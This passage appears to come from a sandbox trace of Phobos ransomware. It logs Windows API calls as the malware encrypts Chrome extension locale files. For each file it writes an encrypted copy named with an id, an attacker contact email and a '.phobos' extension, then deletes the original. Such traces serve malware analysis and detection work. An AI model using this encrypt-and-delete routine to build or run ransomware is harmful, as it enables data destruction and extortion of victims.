lpNewFilePointer=0x0) returned 1 [0154.872] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.873] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.873] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.873] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x96, lpOverlapped=0x0) returned 1 [0154.874] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa0, dwBufLen=0xa0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa0) returned 1 [0154.874] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xa0, lpOverlapped=0x0) returned 1 [0154.875] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0154.875] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.875] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.875] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.875] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.875] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.875] CloseHandle (hObject=0x14c) returned 1 [0154.875] CloseHandle (hObject=0x130) returned 1 [0154.875] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json")) returned 1 [0154.876] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.876] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=180) returned 1 [0154.876] CloseHandle (hObject=0x130) returned 1 [0154.877] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json")) returned 0x2020 [0154.877] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.877] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.877] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.877] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.877] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.877] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb4, lpOverlapped=0x0) returned 1 [0154.920] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0154.920] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0154.921] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0154.921] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.921] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.921] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.921] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.921] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.921] CloseHandle (hObject=0x130) returned 1 [0154.921] CloseHandle (hObject=0x14c) returned 1 [0154.921] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json")) returned 1 [0154.922] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.923] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=187) returned 1 [0154.923] CloseHandle (hObject=0x14c) returned 1 [0154.923] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json")) returned 0x2020 [0154.923] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.923] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.923] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.924] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.924] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.924] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xbb, lpOverlapped=0x0) returned 1 [0154.925] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0154.925] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0154.925] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0154.925] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.925] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.925] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.925] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.926] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.926] CloseHandle (hObject=0x14c) returned 1 [0154.926] CloseHandle (hObject=0x130) returned 1 [0154.926] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json")) returned 1 [0154.927] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.927] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=198) returned 1 [0154.927] CloseHandle (hObject=0x130) returned 1 [0154.927] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json")) returned 0x2020 [0154.927] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.927] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.928] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.928] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.928] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.928] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xc6, lpOverlapped=0x0) returned 1 [0154.929] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0, dwBufLen=0xd0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0) returned 1 [0154.929] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xd0, lpOverlapped=0x0) returned 1 [0154.931] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0154.931] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.931] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.931] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.931] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.931] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.931] CloseHandle (hObject=0x130) returned 1 [0154.931] CloseHandle (hObject=0x14c) returned 1 [0154.932] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json")) returned 1 [0154.933] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.933] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=175) returned 1 [0154.933] CloseHandle (hObject=0x14c) returned 1 [0154.933] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json")) returned 0x2020 [0154.933] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.934] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.934] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.934] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.934] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.934] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xaf, lpOverlapped=0x0) returned 1 [0154.939] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0154.939] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, 